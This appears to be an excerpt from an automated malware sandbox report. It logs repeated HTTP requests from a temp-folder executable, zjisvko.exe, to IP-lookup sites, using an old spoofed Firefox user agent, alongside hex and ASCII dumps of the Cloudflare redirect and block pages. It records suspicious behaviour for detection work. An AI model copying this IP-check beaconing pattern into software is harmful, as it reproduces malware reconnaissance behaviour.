                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    21192.168.11.3049843104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:41.874092102 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:42.018630981 CEST861INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:41 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:41 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjZmut6TrV%2Bi0sP2Fn%2FhOF4WrmEpj%2FnF%2ByfvhKmu7rhjdSRLWcNfCGEuVqpdKl8bgGbdmKu08U66IATDN7NwnKdfPvCgohC4ptZoygR76rWqQvaY%2B7ghCR%2BfbAfPjkM6u2whRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30377b1908a56a-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    22192.168.11.3049844104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.171327114 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.318856955 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:43 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:58 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=dEtUiyT5kOMGsoewrlMsH86fIMeO8ARNOZyXV4KvxLc-1728999583-1.0.1.1-2nrQr8tSbJVapw5qb6k7K8P2GeQ3zP_I4.WtE2QiVZCpLYPYbM1JV_VR7iCk6CIJKZK1SHU9pcyiOMcRKNpVMg; path=/; expires=Tue, 15-Oct-24 14:09:43 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037833af1b3cd-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.318959951 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.319073915 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:43.319186926 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 38 33 33 61 66 31 62 33 63 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3037833af1b3cd</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    23192.168.11.3049848104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.609272003 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:45.757122993 CEST855INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:45 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:45 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZxeowAkA3YTnhxzohwQyIXOPO41z65V37zRezgIbpwQudw0lj%2FPvkR73lNGziMNShEuUlVq1YV4OJlEDH0bUHLrA7xnF5%2FXtJljl%2BlIVrCq70kTnplehuVw1DMwn0clrr9Xxvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037927cdca546-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    24192.168.11.3049850104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:46.904325008 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:47.050240040 CEST859INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:46 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:46 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNq9DC9x%2BmFU%2BMeP0Kl0b1QtBzQ8qCVprEBv4%2FCZvsESeo4j80XmhxoJphHSysMZIadc6HenpcQywnQs%2BEj5B2QG37t7eWKFMFNAFxitmi0gjde3fxFn2WvJL4Lt%2BXeJolZqzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30379a8f0e748b-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    25192.168.11.3049851104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.200788975 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354157925 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:48 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:40:03 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=f1HcTp4Mh3lmZto.Gzc.AT5Ix0xG4UgnN2cTfnm2iRk-1728999588-1.0.1.1-PndGfoVIVSCw_zYFFlO4S9q2OnApUbbdX_ls_VTFBflODamZIdtL8gAjAI96qFwu0vC4bJ_HBrDDlC_xHy.cbA; path=/; expires=Tue, 15-Oct-24 14:09:48 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037a2abeedafd-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354233980 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354248047 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:48.354599953 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 61 32 61 62 65 65 64 61 66 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3037a2abeedafd</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    26192.168.11.3049853104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.497767925 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.638871908 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:49 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:40:04 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=E3F9TcAbDwxgIw_jB78puRTCDn31ed_XiHjZ2Z3uvN4-1728999589-1.0.1.1-NISv8YYKyxEnb7thEwukTJqj8AFicTZWOM9B2o_vB02haPd6jAM53gFjLxVNWz1og_C84jDYFxq8Q2_ry.x2Ww; path=/; expires=Tue, 15-Oct-24 14:09:49 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037aace3209d2-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.638951063 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.639137030 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:49.639149904 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 61 61 63 65 33 32 30 39 64 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
